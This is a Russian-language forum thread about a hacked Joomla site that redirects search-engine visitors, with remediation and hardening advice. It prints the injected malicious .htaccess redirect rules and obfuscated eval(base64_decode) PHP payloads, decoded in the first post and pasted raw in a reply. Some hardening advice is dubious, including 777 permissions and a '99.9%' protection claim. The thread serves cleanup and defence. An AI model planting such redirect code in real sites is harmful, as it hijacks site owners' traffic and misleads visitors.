- Форум
- /
- IT и телекоммуникации
- /
- Программирование
- /
- Joomla!: Сломали сайт, перенаправляя ссылки поисковиков Google, Yandex и др. на сторонний сайт
Joomla!: Сломали сайт, перенаправляя ссылки поисковиков Google, Yandex и др. на сторонний сайт
Rendering Error in layout Widget/Social: Call to a member function exists() on null. Please enable debug mode for more information.
8 года 11 мес. назад - 8 года 11 мес. назад #100
от TOLLIFi
IT и Телеком: IP-телефония, интернет-технологии, программирование, web-сервисы.
COM_KUNENA_MESSAGE_CREATED_NEW
Все ссылки, выданные поисковиками на сайт (CMS Joomla!), перенаправляют Вас на сторонние ресурсы. В чем причина?!
Итак, в один прекрасный день вы обнаруживаете, что все ссылки, выданные разными поисковыми системами, вдруг автоматически перенаправляют Вас на сторонние сайты. Причина сего косяка отнюдь не в поисковиках, а в настройках Вашего сайта на CMS Joomla!... его взломали злые хацкеры.
--- УСТРАНЕНИЕ ПРОБЛЕМЫ >>>
1. Необходимо проверить файл .htaccess в корне сайта.
Обычно каким-то образом сюда добавляются в "невидимой зоне" (за границами окна) тот самый код перенаправления, который необходимо удалить, типа:
, а также могут присутствовать еще кое-какие строчки, их тоже нужно удалить:
2. Также необходимо сделать следующее:
- удалить файлы:
- почистить от кода типа (eval(base64_de code("JGF1dGhfcGFz)); ) след. файлы:
Некоторые пояснения к "левым строчкам кода", внесенными хацкерами на Ваш сайт:
Это зашифрованный код, который можно декодировать, получив следующее:
Как видим, в результате перехода на наш сайт по запросам поисковых систем Google, Yahoo и Bing, происходило автоматическое перенаправление на сайт fgnfdfthrv.bee.pl, с передачей ему текста запроса поисковой системы.
--- ПРЕДОТВРАЩЕНИЕ ПОСЛЕДСТВИЙ >>>
Лекарство от такого взлома (загрузки веб-шелла) готовить довольно просто: во всех директориях сайта, куда посетители могут загружать какие-либо файлы, нужно поставить примерно такие инструкции в файл .htaccess:
--- СПОСОБЫ ЗАЩИТЫ >>>
Ни для кого не секрет, что для обеспечения должной защищенности своего сайта, построенного на Joomla, недостаточно отделаться установкой компонента типа Defender, RS Firewall, X-Defender или аналогичных. Подобного рода компоненты не способны защитить ваш сайт от всех видов посягательств и имеют ряд ограничений, хотя при некоторых атаках (SQL и PHP-инъекции, флуд и т.п.) они показывают достаточно хорошие результаты.
Поэтому ниже я приведу действия, которые необходимо предпринять для защиты своего сайта от большинства посягательств на его целостность и работоспособность.
Сразу оговорюсь, что приведенный материал не претендует на полноту изложения и отражает индивидуальное мнение автора. Некоторые сторонние расширения могут требовать индивидуальной настройки для своих файлов и каталогов.
1. Защита с помощью файла .htaccess.
Добавьте в файл .htaccess в корне сайта следующее:
Эти строки указывают серверу, что необходимо запретить выполнение каких-либо скриптов в корне, кроме файла index.php. И если хакеру удастся загрузить в корень сайта какой-нибудь бэкдор, он все равно не сможет его выполнить на сервере.
Однако, хакер может попытаться загрузить бэкдор с именем index.php в какой-нибудь подкаталог в корне сервера, где он будет успешно выполняться. Поэтому во все подкаталоги первого уровня от корня необходимо поместить файл .htaccess следующего содержания:
Данная мера позволит запретить запуск php-скриптов напрямую.
В каталоге "administrator" необходимо поместить файл .htaccess следующего содержания:
Где IP-адреса вида 11.22.33.44 - это IP-адреса, с которых вы администрируете Joomla. Эта мера поможет, когда хакер каким-то образом смог получить пароль администратора. В этом случае он все равно не сможет залогиниться в административной панели.
В папке "administrator" во все каталоги первого уровня поместите файл .htaccess следующего содержания:
Настройка безопасности с помощью файла .htaccess завершена.
2. Защита доступа по FTP
Все вы прекрасно знаете, что Joomla хранит реквизиты вашего FTP-сервера в файле "configuration.php". И это дает хакеру лишнюю возможность получить FTP-доступ к вашему серверу, прочитав данный файл. Поэтому нам необходимо так настроить FTP-защиту, чтобы разрешить FTP-доступ только с определенных IP-адресов. Таким образом, даже если злоумышленник получит FTP-реквизиты, он не сможет залогиниться на ваш FTP-сервер. Если вы имеете доступ к файлу "/etc/proftpd.conf" на сервере, то добавьте в него следующие строки:
, где IP-адрес 11.22.33.44 - это IP-адрес, с которого вы заходите на ваш FTP-сервер. Не забудьте добавить также IP-адрес 127.0.0.1, чтобы Joomla могла заходить на FTP-сервер через PHP для управления файлами.
Если же вы не имеете доступа к файлу "/etc/proftpd.conf", то скорее всего в панели управления вашей площадкой на хостинге присутствует возможность ограничения доступа по FTP-протоколу. Обязательно узнайте об этом у своего хостера и воспользуйтесь такой настройкой.
3. Блокирование доступа к сайту с определенных IP-адресов.
Далее мы заблокируем доступ к сайту с определенных IP-адресов или даже для конкретных стран. Чтобы узнать нужные IP-адреса конкретных стран, воспользуйтесь этим сервисом.
Заблокировать доступ для диапазонов адресов можно с помощью IP-таблиц. Для этого вам понадобится SSH-доступ к вашему серверу. Если вы не знаете SSH-реквизитов, обратитесь за ними к службе техподдержки вашего хостера.
Войдя в оболочку, введите в коммандной строке:
, где: -I – ключ вставки. Также вы можете использовать ключ –A для добавления IP-адресов к уже существующим записям. Вы можете блокировать как отдельные IP-адреса, так и диапазоны, разделяя начальный и конечный адреса символом "/". Заблокируйте плохих парней из Ирана, Ирака и т.п.
4. Файлы и каталоги.
Следующий шаг состоит в том, чтобы присвоить безопасные атрибуты файлам и каталогам на сервере. Основная идея состоит в том, что владельцем всех файлов и папок должны быть вы как FTP-пользователь. Кроме того, каталоги должны иметь атрибут 755, а файлы 644. Если вы имеете доступ по SSH, то команда, выполненная из корня сайта, будет следующая:
После этого все папки и файлы нельзя будет изменить через PHP.
Но скорее всего вам придется вручную задать атрибуты доступа 777 для каталогов с кэшем и резервного копирования. Не забудьте сделать это.
5. Установка компонента безопасности.
Установите какой-либо компонент безопасности типа Defender, RS Firewall, X-Defender или аналогичный. Этот компонент позаботится обо всем остальном, т.к. мы запретили запуск любых скриптов, кроме index.php.
Выполнив эти пять шагов, Вы защитите свою Joomla от 99.9% атак.
Полезные ссылки по теме:
www.shadowxak.ru/articles/defending-your-joomla.html
joomlaforum.ru/index.php?PHPSESSID=49b20.../topic,195980.0.html
groups.google.com/a/googleproductforums....SLkjrPE/3jw8vn79eBkJ
Итак, в один прекрасный день вы обнаруживаете, что все ссылки, выданные разными поисковыми системами, вдруг автоматически перенаправляют Вас на сторонние сайты. Причина сего косяка отнюдь не в поисковиках, а в настройках Вашего сайта на CMS Joomla!... его взломали злые хацкеры.
--- УСТРАНЕНИЕ ПРОБЛЕМЫ >>>
ВНИМАНИЕ: Спойлер!
[ Нажмите, чтобы развернуть ]
[ Нажмите, чтобы скрыть ]
1. Необходимо проверить файл .htaccess в корне сайта.
Обычно каким-то образом сюда добавляются в "невидимой зоне" (за границами окна) тот самый код перенаправления, который необходимо удалить, типа:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule
^(.*)$ http://sas-air.ru/space?7 [R=301,L]
RewriteCond %{HTTP_REFERER}
^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule
^(.*)$ http://sas-air.ru/space?7 [R=301,L]
</IfModule>
ErrorDocument 400 http://sas-air.ru/space?7
ErrorDocument 401 http://sas-air.ru/space?7
ErrorDocument 403 http://sas-air.ru/space?7
ErrorDocument 404 http://sas-air.ru/space?7
ErrorDocument 500 http://sas-air.ru/space?7
- удалить файлы:
\includes\post.php
\templates\index.php
\images\img.php
- почистить от кода типа (eval(base64_de code("JGF1dGhfcGFz)); ) след. файлы:
\templates\<ваша тема>\index.php
\includes\defines.php
eval(base64_decode("CglpZiAoc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCJnb29nbGUiKSkgewoJaWYgKCFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sIi5udSIpIGFuZCAhc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCJzaXRlIikgYW5kICFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sImludXJsIikpewoJCXByZWdfbWF0Y2ggKCIvcVw9KC4qKS8iLCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sJGtrKTsKCQlpZiAoc3RyaXN0cigka2tbMV0sIiYiKSkgewoJCQlwcmVnX21hdGNoICgiLyguKj8pXCYvIiwka2tbMV0sJGtleTIpOwoJCQkka2V5d29yZD11cmxkZWNvZGUoJGtleTJbMV0pOwoJCX1lbHNlIHsKCQkJJGtleXdvcmQ9dXJsZGVjb2RlKCRra1sxXSk7CgkJfQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mZ25mZGZ0aHJ2LmJlZS5wbC8/cT0iLiRrZXl3b3JkKTsKCQlleGl0KCk7Cgl9Cgp9ZWxzZWlmIChzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sInlhaG9vIikpIHsKcHJlZ19tYXRjaCAoIi9wXD0oLio/KSYvIiwkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCRrayk7CgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2ZnbmZkZnRocnYuYmVlLnBsLz9xPSIuJGtrWzFdKTsKCQlleGl0KCk7Cn1lbHNlaWYgKHN0cmlzdHIoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwiYmluZyIpKSB7CnByZWdfbWF0Y2ggKCIvcVw9KC4qPykmLyIsJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwka2spOwoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mZ25mZGZ0aHJ2LmJlZS5wbC8/cT0iLiRra1sxXSk7CgkJZXhpdCgpOwp9Cgk="));
if (stristr($_SERVER[HTTP_REFERER],"google")) {
if (!stristr($_SERVER[HTTP_REFERER],".nu") and !stristr($_SERVER[HTTP_REFERER],"site") and !stristr($_SERVER[HTTP_REFERER],"inurl")){
preg_match ("/q\=(.*)/",$_SERVER[HTTP_REFERER],$kk);
if (stristr($kk[1],"&")) {
preg_match ("/(.*?)\&/",$kk[1],$key2);
$keyword=urldecode($key2[1]);
}else {
$keyword=urldecode($kk[1]);
}
header("Location: http://fgnfdfthrv.bee.pl/?q=".$keyword);
exit();
}
}elseif (stristr($_SERVER[HTTP_REFERER],"yahoo")) {
preg_match ("/p\=(.*?)&/",$_SERVER[HTTP_REFERER],$kk);
header("Location: http://fgnfdfthrv.bee.pl/?q=".$kk[1]);
exit();
}elseif (stristr($_SERVER[HTTP_REFERER],"bing")) {
preg_match ("/q\=(.*?)&/",$_SERVER[HTTP_REFERER],$kk);
header("Location: http://fgnfdfthrv.bee.pl/?q=".$kk[1]);
exit();
}
--- ПРЕДОТВРАЩЕНИЕ ПОСЛЕДСТВИЙ >>>
ВНИМАНИЕ: Спойлер!
[ Нажмите, чтобы развернуть ]
[ Нажмите, чтобы скрыть ]
Лекарство от такого взлома (загрузки веб-шелла) готовить довольно просто: во всех директориях сайта, куда посетители могут загружать какие-либо файлы, нужно поставить примерно такие инструкции в файл .htaccess:
<Files ~ "\.php*|\.phtml|\.cgi|\.pl|\.asp|\.aspx|\.shtml">
Deny from all
</Files>
--- СПОСОБЫ ЗАЩИТЫ >>>
ВНИМАНИЕ: Спойлер!
[ Нажмите, чтобы развернуть ]
[ Нажмите, чтобы скрыть ]
Ни для кого не секрет, что для обеспечения должной защищенности своего сайта, построенного на Joomla, недостаточно отделаться установкой компонента типа Defender, RS Firewall, X-Defender или аналогичных. Подобного рода компоненты не способны защитить ваш сайт от всех видов посягательств и имеют ряд ограничений, хотя при некоторых атаках (SQL и PHP-инъекции, флуд и т.п.) они показывают достаточно хорошие результаты.
Поэтому ниже я приведу действия, которые необходимо предпринять для защиты своего сайта от большинства посягательств на его целостность и работоспособность.
Сразу оговорюсь, что приведенный материал не претендует на полноту изложения и отражает индивидуальное мнение автора. Некоторые сторонние расширения могут требовать индивидуальной настройки для своих файлов и каталогов.
1. Защита с помощью файла .htaccess.
Добавьте в файл .htaccess в корне сайта следующее:
order deny,allow
deny from all
order allow,deny
allow from all
order deny,allow
allow from all
Однако, хакер может попытаться загрузить бэкдор с именем index.php в какой-нибудь подкаталог в корне сервера, где он будет успешно выполняться. Поэтому во все подкаталоги первого уровня от корня необходимо поместить файл .htaccess следующего содержания:
Deny from all
В каталоге "administrator" необходимо поместить файл .htaccess следующего содержания:
order deny,allow
deny from all
order deny,allow
deny from all
allow from 11.11.11.11
allow from 22.22.22.22
allow from 33.33.33.33
order deny,allow
deny from all
allow from 11.11.11.11
allow from 22.22.22.22
allow from 33.33.33.33
order deny,allow
deny from all
allow from 11.11.11.11
allow from 22.22.22.22
allow from 33.33.33.33
В папке "administrator" во все каталоги первого уровня поместите файл .htaccess следующего содержания:
Deny from all
2. Защита доступа по FTP
Все вы прекрасно знаете, что Joomla хранит реквизиты вашего FTP-сервера в файле "configuration.php". И это дает хакеру лишнюю возможность получить FTP-доступ к вашему серверу, прочитав данный файл. Поэтому нам необходимо так настроить FTP-защиту, чтобы разрешить FTP-доступ только с определенных IP-адресов. Таким образом, даже если злоумышленник получит FTP-реквизиты, он не сможет залогиниться на ваш FTP-сервер. Если вы имеете доступ к файлу "/etc/proftpd.conf" на сервере, то добавьте в него следующие строки:
Order allow,deny
Allow from 11.22.33.44
Allow from 127.0.0.1
Deny from all
Если же вы не имеете доступа к файлу "/etc/proftpd.conf", то скорее всего в панели управления вашей площадкой на хостинге присутствует возможность ограничения доступа по FTP-протоколу. Обязательно узнайте об этом у своего хостера и воспользуйтесь такой настройкой.
3. Блокирование доступа к сайту с определенных IP-адресов.
Далее мы заблокируем доступ к сайту с определенных IP-адресов или даже для конкретных стран. Чтобы узнать нужные IP-адреса конкретных стран, воспользуйтесь этим сервисом.
Заблокировать доступ для диапазонов адресов можно с помощью IP-таблиц. Для этого вам понадобится SSH-доступ к вашему серверу. Если вы не знаете SSH-реквизитов, обратитесь за ними к службе техподдержки вашего хостера.
Войдя в оболочку, введите в коммандной строке:
/sbin/iptables -I INPUT -s 88.147.196.0/88.147.253.255 -j DROP
4. Файлы и каталоги.
Следующий шаг состоит в том, чтобы присвоить безопасные атрибуты файлам и каталогам на сервере. Основная идея состоит в том, что владельцем всех файлов и папок должны быть вы как FTP-пользователь. Кроме того, каталоги должны иметь атрибут 755, а файлы 644. Если вы имеете доступ по SSH, то команда, выполненная из корня сайта, будет следующая:
chown -R user:group ./
chmod -R 0644 ./
find . -type d -exec chmod 755 {} ;
Но скорее всего вам придется вручную задать атрибуты доступа 777 для каталогов с кэшем и резервного копирования. Не забудьте сделать это.
5. Установка компонента безопасности.
Установите какой-либо компонент безопасности типа Defender, RS Firewall, X-Defender или аналогичный. Этот компонент позаботится обо всем остальном, т.к. мы запретили запуск любых скриптов, кроме index.php.
Выполнив эти пять шагов, Вы защитите свою Joomla от 99.9% атак.
Источник: Сайт разработчика Joomla, Joostina, 1c (shadowxak.ru)
Полезные ссылки по теме:
www.shadowxak.ru/articles/defending-your-joomla.html
joomlaforum.ru/index.php?PHPSESSID=49b20.../topic,195980.0.html
groups.google.com/a/googleproductforums....SLkjrPE/3jw8vn79eBkJ
IT и Телеком: IP-телефония, интернет-технологии, программирование, web-сервисы.
Last edit: 8 года 11 мес. назад by TOLLIFi.
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
8 года 4 мес. назад #119
от mikl1603
COM_KUNENA_MESSAGE_REPLIED_NEW
Спасибо большое за статью. А то я даже и не знал откуда эта дрянь взялась. Но у меня получилось немного посерьёзнее. У меня з ВСЕ файлы .php заражены вот таим кодом: eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9iZXN0cnUyLm9uZWR1bWIuY29tLyIpOw0KCQlleGl0KCk7DQoJfQ0KfQ0KfQ=="));
Вы не подскажите как можно не в ручную удалить из всех файлов эту дрянь? Спасибо.
Вы не подскажите как можно не в ручную удалить из всех файлов эту дрянь? Спасибо.
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
8 года 4 мес. назад #120
от TOLLIFi
IT и Телеком: IP-телефония, интернет-технологии, программирование, web-сервисы.
COM_KUNENA_MESSAGE_REPLIED_NEW
Сам так не делал, ну, наверное, можно попробовать, если вариантов нету:
"...Удаление внедренного кода вручную-это совсем не трудно,когда я могу сжать весь сайт,загрузить его на свой компьютер,и использовать TextCrawler для поиска и замены и сжать файлы в ZIP файл снова, загрузить его на веб-сайт и извлечь..."
источник: kompkimi.ru/?p=34462 . Отпишите о результатах, если найдете более "красивый" способ
"...Удаление внедренного кода вручную-это совсем не трудно,когда я могу сжать весь сайт,загрузить его на свой компьютер,и использовать TextCrawler для поиска и замены и сжать файлы в ZIP файл снова, загрузить его на веб-сайт и извлечь..."
источник: kompkimi.ru/?p=34462 . Отпишите о результатах, если найдете более "красивый" способ

IT и Телеком: IP-телефония, интернет-технологии, программирование, web-сервисы.
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
8 года 4 мес. назад #121
от mikl1603
COM_KUNENA_MESSAGE_REPLIED_NEW
В принципе так и сделал, но использовал программу Text_Replacer. Обалденная штука. 30 сек и нет проблемм
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
- Вы здесь:
-
Главная
-
Форум
-
IT и телекоммуникации
-
Программирование
- Joomla!: Сломали сайт, перенаправляя ссылки поисковиков Google, Yandex и др. на сторонний сайт